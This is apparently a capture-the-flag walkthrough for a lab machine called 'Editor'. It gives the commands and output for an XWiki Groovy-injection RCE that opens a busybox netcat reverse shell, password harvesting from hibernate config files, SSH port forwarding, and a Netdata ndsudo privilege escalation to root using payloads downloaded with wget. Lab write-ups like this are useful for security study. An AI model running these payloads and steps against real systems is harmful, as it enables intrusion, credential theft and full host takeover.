Proof of Concept

10.129.33.27

Nmap

PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
8080/tcp open  http-proxy

Initial Access

Performed detailed port scan on port 8080 and identified XWiki service is running

┌──(kali🎃kali)-[~/Editor]
└─$ sudo nmap 10.129.33.27 -p8080 -sCV --min-rate 3000
Starting Nmap 7.98 ( https://nmap.org ) at 2026-01-12 08:32 -0500
Stats: 0:00:37 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 92.62% done; ETC: 08:33 (0:00:02 remaining)
Stats: 0:01:08 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 95.97% done; ETC: 08:34 (0:00:03 remaining)
Nmap scan report for 10.nate.com (10.129.33.27)
Host is up (0.16s latency).
 
PORT     STATE SERVICE VERSION
8080/tcp open  http    Jetty 10.0.20
| http-webdav-scan:
|   WebDAV type: Unknown
|   Server Type: Jetty(10.0.20)
|_  Allowed Methods: OPTIONS, GET, HEAD, PROPFIND, LOCK, UNLOCK
| http-robots.txt: 50 disallowed entries (15 shown)
| /xwiki/bin/viewattachrev/ /xwiki/bin/viewrev/
| /xwiki/bin/pdf/ /xwiki/bin/edit/ /xwiki/bin/create/
| /xwiki/bin/inline/ /xwiki/bin/preview/ /xwiki/bin/save/
| /xwiki/bin/saveandcontinue/ /xwiki/bin/rollback/ /xwiki/bin/deleteversions/
| /xwiki/bin/cancel/ /xwiki/bin/delete/ /xwiki/bin/deletespace/
|_/xwiki/bin/undelete/
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Jetty(10.0.20)
| http-methods:
|_  Potentially risky methods: PROPFIND LOCK UNLOCK
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 110.44 seconds

Found RCE vulnerability (CVE-2025-24893) and downloaded POC

https://github.com/gunzf0x/CVE-2025-24893

┌──(kali🎃kali)-[~/Editor]
└─$ git clone https://github.com/gunzf0x/CVE-2025-24893.git
Cloning into 'CVE-2025-24893'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 7 (delta 1), reused 7 (delta 1), pack-reused 0 (from 0)
Receiving objects: 100% (7/7), done.
Resolving deltas: 100% (1/1), done.

Executed POC

┌──(kali🎃kali)-[~/Editor/CVE-2025-24893]
└─$ python CVE-2025-24893.py -t 'http://10.129.33.27:8080' -c 'busybox nc 10.10.14.102 4444 -e sh'
[*] Attacking http://10.129.33.27:8080
[*] Injecting the payload:
http://10.129.33.27:8080/xwiki/bin/get/Main/SolrSearch?media=rss&text=%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7D%22busybox%20nc%2010.10.14.102%204444%20-e%20sh%22.execute%28%29%7B%7B/groovy%7D%7D%7B%7B/async%7D%7D
[*] Command executed
 
~Happy Hacking

Successfully obtained reverse shell connection

┌──(kali🎃kali)-[~/Editor]
└─$ rlwrap nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.102] from (UNKNOWN) [10.129.33.27] 35376
id
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

Lateral Movement

Enumerated /home directory and found a user “oliver”

xwiki@editor:/home$ ls ls
ls
oliver

Searched /etc/xwiki directory for strings “passwd” and found two passwords:

theEd1t0rTeam99
xwikipassword2025

xwiki@editor:/etc/xwiki$ gregrep -r "passw" .
grep -r "passw" .
./hibernate.cfg.xml:    <property name="hibernate.connection.password">theEd1t0rTeam99</property>
<SNIP>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwikipassword2025</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password"></property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password">xwiki</property>
./hibernate.cfg.xml.ucf-dist:    <property name="hibernate.connection.password"></property>
./fonts/LICENSE-freefont:source code form), and must require no special password or key for

Successfully authenticated via SSH as user oliver with password “theEd1t0rTeam99”

┌──(kali🎃kali)-[~/Editor]
└─$ nxc ssh 10.129.33.27 -u 'oliver' -p password.txt
SSH         10.129.33.27    22     10.129.33.27     [*] SSH-2.0-OpenSSH_8.9p1 Ubuntu-3ubuntu0.13
SSH         10.129.33.27    22     10.129.33.27     [-] oliver:xwikipassword2025
SSH         10.129.33.27    22     10.129.33.27     [+] oliver:theEd1t0rTeam99  Linux - Shell access!

Connected SSH service

┌──(kali🎃kali)-[~/Editor]
└─$ ssh oliver@10.129.33.27
oliver@10.129.33.27's password:
Welcome to Ubuntu 22.04.5 LTS (GNU/Linux 5.15.0-151-generic x86_64)
 
 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
 
 System information as of Mon Jan 12 03:33:19 PM UTC 2026
 
  System load:  0.0               Processes:             264
  Usage of /:   65.5% of 7.28GB   Users logged in:       0
  Memory usage: 56%               IPv4 address for eth0: 10.129.33.27
  Swap usage:   0%
 
 
Expanded Security Maintenance for Applications is not enabled.
 
4 updates can be applied immediately.
To see these additional updates run: apt list --upgradable
 
4 additional security updates can be applied with ESM Apps.
Learn more about enabling ESM Apps service at https://ubuntu.com/esm
 
 
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
 
 
Last login: Mon Jan 12 15:34:18 2026 from 10.10.14.102
oliver@editor:~$

Read user.txt

oliver@editor:~$ cat user.txt
692d5b18d97dd6408f70b08dfd21bb63
oliver@editor:~$ ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:a3:cc:a2:e3  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.33.27  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:b9:a3:9f  txqueuelen 1000  (Ethernet)
        RX packets 19566  bytes 2422473 (2.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11032  bytes 6460279 (6.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 11038  bytes 2451725 (2.4 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 11038  bytes 2451725 (2.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

Privilege Escalation

Executed linux-smart-enumeration and found services listening only on localhost

================================================================( network )=====
[*] net000 Services listening only on localhost............................ yes!
---
udp   UNCONN 0      0               127.0.0.1:8125       0.0.0.0:*
tcp   LISTEN 0      151             127.0.0.1:3306       0.0.0.0:*
tcp   LISTEN 0      4096            127.0.0.1:8125       0.0.0.0:*
tcp   LISTEN 0      4096            127.0.0.1:19999      0.0.0.0:*
tcp   LISTEN 0      70              127.0.0.1:33060      0.0.0.0:*
tcp   LISTEN 0      4096            127.0.0.1:33281      0.0.0.0:*

Performed SSH Port-forwarding to access internal services from the kali linux

┌──(kali🎃kali)-[~/Editor]
└─$ ssh -L 8125:127.0.0.1:8125 -L 3306:127.0.0.1:3306 -L 8125:127.0.0.1:8125 -L 19999:127.0.0.1:19999 -L 33060:127.0.0.1:33060 -L 33281:127.0.0.1:33281 oliver@10.129.33.27 -f -N
oliver@10.129.33.27's password:

Browsed to http://127.0.0.1:19999 and confirmed Netdata service running

Found privilege escalation vulnerability in Netdata ndsudo (CVE-2024-32019)

https://github.com/T1erno/CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

┌──(kali🎃kali)-[~/Editor]
└─$ git clone https://github.com/T1erno/CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC.git
Cloning into 'CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC'...
remote: Enumerating objects: 6, done.
remote: Counting objects: 100% (6/6), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 6 (delta 0), reused 6 (delta 0), pack-reused 0 (from 0)
Receiving objects: 100% (6/6), done.

Compiled payload on my kali linux

┌──(kali🎃kali)-[~/Editor]
└─$ cd CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC

┌──(kali🎃kali)-[~/Editor/CVE-2024-32019-Netdata-ndsudo-Privilege-Escalation-PoC]
└─$ gcc -static payload.c -o nvme -Wall -Werror -Wpedantic

Uploaded and executed POC to get root shell

oliver@editor:~$ wget http://10.10.14.102:8000/CVE-2024-32019.sh
--2026-01-12 16:31:37--  http://10.10.14.102:8000/CVE-2024-32019.sh
Connecting to 10.10.14.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 712 [application/x-sh]
Saving to: ‘CVE-2024-32019.sh’
 
CVE-2024-32019.sh                    100%[=====================================================================>]     712  --.-KB/s    in 0s
 
2026-01-12 16:31:37 (55.7 MB/s) - ‘CVE-2024-32019.sh’ saved [712/712]
 
oliver@editor:~$ wget http://10.10.14.102:8000/nvme
--2026-01-12 16:31:44--  http://10.10.14.102:8000/nvme
Connecting to 10.10.14.102:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 825008 (806K) [application/octet-stream]
Saving to: ‘nvme’
 
nvme                                 100%[=====================================================================>] 805.67K   396KB/s    in 2.0s
 
2026-01-12 16:31:46 (396 KB/s) - ‘nvme’ saved [825008/825008]
 
oliver@editor:~$ l
CVE-2024-32019.sh  linpeas  linpeas.sh*  lse  lse.sh*  nvme  user.txt
oliver@editor:~$ sh CVE-2024-32019.sh
[+] ndsudo found at: /opt/netdata/usr/libexec/netdata/plugins.d/ndsudo
[+] File 'nvme' found in the current directory.
[+] Execution permissions granted to ./nvme
[+] Running ndsudo with modified PATH:
root@editor:/home/oliver# id
uid=0(root) gid=0(root) groups=0(root),999(netdata),1000(oliver)

Read root.txt

root@editor:/root# cat root.txt
4a5e14ede80d62c60d5c0c763afb156c
root@editor:/root# ifconfig
docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500
        inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255
        ether 02:42:a3:cc:a2:e3  txqueuelen 0  (Ethernet)
        RX packets 0  bytes 0 (0.0 B)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 0  bytes 0 (0.0 B)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 10.129.33.27  netmask 255.255.0.0  broadcast 10.129.255.255
        ether 00:50:56:b9:a3:9f  txqueuelen 1000  (Ethernet)
        RX packets 39639  bytes 7534419 (7.5 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 22356  bytes 12472436 (12.4 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 19967  bytes 9212233 (9.2 MB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 19967  bytes 9212233 (9.2 MB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

KalioNix

Explorer

Editor